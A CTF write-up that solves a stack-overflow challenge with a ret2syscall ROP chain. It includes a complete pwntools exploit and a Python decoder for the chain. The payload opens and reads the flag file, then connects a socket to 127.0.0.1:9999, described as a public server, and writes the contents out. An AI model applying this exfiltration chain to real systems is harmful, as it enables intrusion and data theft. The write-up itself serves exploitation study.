BingDWenDWen
<h1>Analysis</h1>
<p><img src="https://pic.imgdb.cn/item/63b030a22bbf0e7994fda482.png" alt="" /> </p>
<p>There is a stack overflow here.</p>
<p><img src="https://pic.imgdb.cn/item/63b030df2bbf0e7994fe5dea.png" alt="" /> </p>
<p>The binary also ships a <code>syscall</code> gadget, so this is most likely a ret2syscall challenge.<img src="https://pic.imgdb.cn/item/63b031492bbf0e7994fff095.png" alt="" /></p>
<p>The program contains plenty of gadgets that can be used directly. Because it closes stdin, stdout and stderr before the overflow, the plan is to open a socket from the ROP chain and write the flag out to a server on the public internet.</p>
<p>Payload design</p>
<pre><code># struct sockaddr_in for connect(): sin_family=AF_INET (host order), sin_port=9999 and
# sin_addr=127.0.0.1 (both network order), then 8 bytes of sin_zero. The buffer lands at
# 0x403700, so this is the address passed to connect() below.
payload = p16(2) + p16(9999, endian="big") + p32(0x7f000001, endian="big") + p64(0)
# open("flag", 0, 0) -- stdin is closed, so the lowest free fd, 0, is returned
payload += p64(pop_rdx) + p64(0) + p64(pop_rsi) + p64(0)
payload += p64(pop_rdi) + p64(0x403700+0x178) + p64(pop_rax) + p64(2)
payload += p64(syscall)
# read(0, buf, 0x50) -- fd 0 is the flag file opened above
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(0) + p64(syscall)
# socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6) -- returns the next free fd, 1
payload += p64(pop_rdi) + p64(2) + p64(pop_rsi) + p64(1) + p64(pop_rdx) + p64(6)
payload += p64(pop_rax) + p64(41) + p64(syscall)
# connect(1, &amp;addr, 0x10) -- addr is the sockaddr_in at the start of the buffer
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700) + p64(pop_rdx) + p64(0x10)
payload += p64(pop_rax) + p64(42) + p64(syscall)
# write(1, buf, 0x50) -- send the flag bytes over the socket
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(1) + p64(syscall)
# pad, then place the NUL-terminated "flag" filename at buffer+0x178
payload = payload.ljust(0x150, b'a')
payload += b"flag\x00\x00\x00"</code></pre>
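<p>To check a chain like this before running it, it helps to decode it back into the syscall sequence it performs and to confirm the fd numbering the closed standard streams produce. The following is an added example, not code from the writeup: it rebuilds the same payload with <code>struct</code> instead of pwntools (the gadget addresses and the 0x403700 buffer address are taken from the writeup and assumed correct), parses the leading <code>sockaddr_in</code>, walks the 8-byte slots to recover each syscall with its arguments, and simulates lowest-free-fd allocation to show why <code>open</code> gets fd 0 and <code>socket</code> gets fd 1 only when stdin/stdout/stderr are closed.</p>

```python
import struct
from socket import inet_ntoa

# Gadget addresses from the writeup (assumed correct for this binary).
POP_RAX, POP_RDI, POP_RSI, POP_RDX, SYSCALL = 0x40135a, 0x401356, 0x401358, 0x401354, 0x401351
BUF = 0x403700  # address the overflowed buffer lives at, per the writeup
GADGETS = {POP_RAX: "pop rax", POP_RDI: "pop rdi", POP_RSI: "pop rsi", POP_RDX: "pop rdx", SYSCALL: "syscall"}
# x86-64 Linux syscall numbers used by the chain.
SYSCALL_NAMES = {0: "read", 1: "write", 2: "open", 41: "socket", 42: "connect"}


def q(*vals):
    """Pack values as little-endian 64-bit slots (stand-in for pwntools p64)."""
    return b"".join(struct.pack("<Q", v) for v in vals)


def build_sample_payload():
    """Constructed sample input: the writeup's chain rebuilt with struct.pack."""
    sockaddr = struct.pack("<H", 2) + struct.pack(">H", 9999) + struct.pack(">I", 0x7f000001) + struct.pack("<Q", 0)
    chain = q(POP_RDX, 0, POP_RSI, 0, POP_RDI, BUF + 0x178, POP_RAX, 2, SYSCALL)        # open
    chain += q(POP_RDI, 0, POP_RSI, BUF + 0x180, POP_RDX, 0x50, POP_RAX, 0, SYSCALL)   # read
    chain += q(POP_RDI, 2, POP_RSI, 1, POP_RDX, 6, POP_RAX, 41, SYSCALL)               # socket
    chain += q(POP_RDI, 1, POP_RSI, BUF, POP_RDX, 0x10, POP_RAX, 42, SYSCALL)          # connect
    chain += q(POP_RDI, 1, POP_RSI, BUF + 0x180, POP_RDX, 0x50, POP_RAX, 1, SYSCALL)   # write
    return (sockaddr + chain).ljust(0x170, b"a") + b"flag\x00\x00\x00"


def parse_sockaddr_in(raw):
    """Decode the 16-byte struct sockaddr_in at the start of the payload."""
    family = struct.unpack("<H", raw[0:2])[0]  # sin_family is in host byte order
    port = struct.unpack(">H", raw[2:4])[0]    # sin_port is in network byte order
    ip = inet_ntoa(raw[4:8])                   # sin_addr is in network byte order
    return {"family": family, "port": port, "ip": ip}


def decode_chain(chain):
    """Walk 8-byte slots, track rax/rdi/rsi/rdx, and list (name, rdi, rsi, rdx) per syscall."""
    regs = {"rax": None, "rdi": None, "rsi": None, "rdx": None}
    slots = [struct.unpack("<Q", chain[i:i + 8])[0] for i in range(0, len(chain) - len(chain) % 8, 8)]
    calls, i = [], 0
    while i < len(slots):
        gadget = GADGETS.get(slots[i])
        if gadget is None:
            break  # padding or data: the executable part of the chain has ended
        if gadget.startswith("pop "):
            regs[gadget[4:]] = slots[i + 1]  # the slot after a pop gadget is its operand
            i += 2
        else:
            name = SYSCALL_NAMES.get(regs["rax"], "sys_%r" % regs["rax"])
            calls.append((name, regs["rdi"], regs["rsi"], regs["rdx"]))
            i += 1
    return calls


def simulate_fds(calls, closed_std=True):
    """Return the fd each open()/socket() would receive under lowest-free-fd allocation."""
    in_use = set() if closed_std else {0, 1, 2}
    got = {}
    for name, _rdi, _rsi, _rdx in calls:
        if name in ("open", "socket"):
            fd = 0
            while fd in in_use:
                fd += 1
            in_use.add(fd)
            got[name] = fd
    return got


if __name__ == "__main__":
    payload = build_sample_payload()
    print(parse_sockaddr_in(payload[:16]))
    for call in decode_chain(payload[16:]):
        print(call)
    print("fds with std streams closed:", simulate_fds(decode_chain(payload[16:])))
    print("fds with std streams open:  ", simulate_fds(decode_chain(payload[16:]), closed_std=False))
```

<p>Decoding also makes the layout visible: the sockaddr plus the five syscall blocks total exactly 0x178 bytes, so the <code>ljust</code> is a no-op and the <code>"flag"</code> string lands at buffer+0x178, which is the address the <code>open</code> block passes in rdi; the 0x50-byte read buffer at +0x180 sits just past it.</p>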
<h1>Exploit</h1>
<pre><code>from pwn import *
o = process("./pwn")
# gadget addresses found in the binary
pop_rax = 0x000000000040135a
pop_rdi = 0x0000000000401356
pop_rsi = 0x0000000000401358
pop_rdx = 0x0000000000401354
syscall = 0x401351
# sockaddr_in (AF_INET, port 9999, 127.0.0.1) at the start of the buffer (0x403700)
payload = p16(2) + p16(9999, endian="big") + p32(0x7f000001, endian="big") + p64(0)
# open("flag", 0, 0) -&gt; fd 0, since stdin is closed
payload += p64(pop_rdx) + p64(0) + p64(pop_rsi) + p64(0)
payload += p64(pop_rdi) + p64(0x403700+0x178) + p64(pop_rax) + p64(2)
payload += p64(syscall)
# read(0, buf, 0x50)
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(0) + p64(syscall)
# socket(2, 1, 6) -&gt; fd 1
payload += p64(pop_rdi) + p64(2) + p64(pop_rsi) + p64(1) + p64(pop_rdx) + p64(6)
payload += p64(pop_rax) + p64(41) + p64(syscall)
# connect(1, &amp;addr, 0x10)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700) + p64(pop_rdx) + p64(0x10)
payload += p64(pop_rax) + p64(42) + p64(syscall)
# write(1, buf, 0x50)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(1) + p64(syscall)
# pad and append the filename at buffer+0x178 (bytes, for Python 3 pwntools)
payload = payload.ljust(0x170, b'a')
payload += b"flag\x00\x00\x00"
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63b036ee2bbf0e799416020a.png" alt="" /></p>